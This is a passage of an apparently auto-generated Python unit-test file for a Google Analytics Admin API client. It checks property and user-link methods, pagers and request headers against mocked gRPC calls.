mock.patch.object(type(client.transport.list_properties), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListPropertiesResponse( properties=[ resources.Property(), resources.Property(), resources.Property(), ], next_page_token="abc", ), analytics_admin.ListPropertiesResponse( properties=[], next_page_token="def", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(),], next_page_token="ghi", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(), resources.Property(),], ), RuntimeError, ) pages = list(client.list_properties(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_properties_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_properties), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListPropertiesResponse( properties=[ resources.Property(), resources.Property(), resources.Property(), ], next_page_token="abc", ), analytics_admin.ListPropertiesResponse( properties=[], next_page_token="def", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(),], next_page_token="ghi", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(), resources.Property(),], ), RuntimeError, ) async_pager = await client.list_properties(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.Property) for i in responses) @pytest.mark.asyncio async def test_list_properties_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_properties), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListPropertiesResponse( properties=[ resources.Property(), resources.Property(), resources.Property(), ], next_page_token="abc", ), analytics_admin.ListPropertiesResponse( properties=[], next_page_token="def", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(),], next_page_token="ghi", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(), resources.Property(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_properties(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_property( transport: str = "grpc", request_type=analytics_admin.CreatePropertyRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) response = client.create_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreatePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD def test_create_property_from_dict(): test_create_property(request_type=dict) def test_create_property_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_property), "__call__") as call: client.create_property() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreatePropertyRequest() @pytest.mark.asyncio async def test_create_property_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreatePropertyRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) ) response = await client.create_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreatePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD @pytest.mark.asyncio async def test_create_property_async_from_dict(): await test_create_property_async(request_type=dict) def test_create_property_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_property(property=resources.Property(name="name_value"),) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") def test_create_property_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_property( analytics_admin.CreatePropertyRequest(), property=resources.Property(name="name_value"), ) @pytest.mark.asyncio async def test_create_property_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_property( property=resources.Property(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") @pytest.mark.asyncio async def test_create_property_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_property( analytics_admin.CreatePropertyRequest(), property=resources.Property(name="name_value"), ) def test_delete_property( transport: str = "grpc", request_type=analytics_admin.DeletePropertyRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) response = client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeletePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD def test_delete_property_from_dict(): test_delete_property(request_type=dict) def test_delete_property_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: client.delete_property() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeletePropertyRequest() @pytest.mark.asyncio async def test_delete_property_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeletePropertyRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) ) response = await client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeletePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD @pytest.mark.asyncio async def test_delete_property_async_from_dict(): await test_delete_property_async(request_type=dict) def test_delete_property_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeletePropertyRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: call.return_value = resources.Property() client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_property_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeletePropertyRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) await client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_property_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_property(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_property_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_property( analytics_admin.DeletePropertyRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_property_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_property(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_property_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_property( analytics_admin.DeletePropertyRequest(), name="name_value", ) def test_update_property( transport: str = "grpc", request_type=analytics_admin.UpdatePropertyRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) response = client.update_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdatePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD def test_update_property_from_dict(): test_update_property(request_type=dict) def test_update_property_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: client.update_property() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdatePropertyRequest() @pytest.mark.asyncio async def test_update_property_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdatePropertyRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) ) response = await client.update_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdatePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD @pytest.mark.asyncio async def test_update_property_async_from_dict(): await test_update_property_async(request_type=dict) def test_update_property_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdatePropertyRequest() request.property.name = "property.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: call.return_value = resources.Property() client.update_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "property.name=property.name/value",) in kw[ "metadata" ] @pytest.mark.asyncio async def test_update_property_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdatePropertyRequest() request.property.name = "property.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) await client.update_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "property.name=property.name/value",) in kw[ "metadata" ] def test_update_property_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_property( property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_property_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_property( analytics_admin.UpdatePropertyRequest(), property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_property_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_property( property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_property_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_property( analytics_admin.UpdatePropertyRequest(), property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_get_user_link( transport: str = "grpc", request_type=analytics_admin.GetUserLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) response = client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] def test_get_user_link_from_dict(): test_get_user_link(request_type=dict) def test_get_user_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: client.get_user_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetUserLinkRequest() @pytest.mark.asyncio async def test_get_user_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetUserLinkRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) ) response = await client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] @pytest.mark.asyncio async def test_get_user_link_async_from_dict(): await test_get_user_link_async(request_type=dict) def test_get_user_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetUserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: call.return_value = resources.UserLink() client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_user_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetUserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) await client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_user_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_user_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_user_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_user_link( analytics_admin.GetUserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_user_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_user_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_user_link( analytics_admin.GetUserLinkRequest(), name="name_value", ) def test_batch_get_user_links( transport: str = "grpc", request_type=analytics_admin.BatchGetUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_get_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.BatchGetUserLinksResponse() response = client.batch_get_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchGetUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchGetUserLinksResponse) def test_batch_get_user_links_from_dict(): test_batch_get_user_links(request_type=dict) def test_batch_get_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_get_user_links), "__call__" ) as call: client.batch_get_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchGetUserLinksRequest() @pytest.mark.asyncio async def test_batch_get_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.BatchGetUserLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_get_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchGetUserLinksResponse() ) response = await client.batch_get_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchGetUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchGetUserLinksResponse) @pytest.mark.asyncio async def test_batch_get_user_links_async_from_dict(): await test_batch_get_user_links_async(request_type=dict) def test_batch_get_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchGetUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_get_user_links), "__call__" ) as call: call.return_value = analytics_admin.BatchGetUserLinksResponse() client.batch_get_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_batch_get_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchGetUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_get_user_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchGetUserLinksResponse() ) await client.batch_get_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_user_links( transport: str = "grpc", request_type=analytics_admin.ListUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListUserLinksResponse( next_page_token="next_page_token_value", ) response = client.list_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListUserLinksPager) assert response.next_page_token == "next_page_token_value" def test_list_user_links_from_dict(): test_list_user_links(request_type=dict) def test_list_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: client.list_user_links() call.assert_called() _, args, _ = 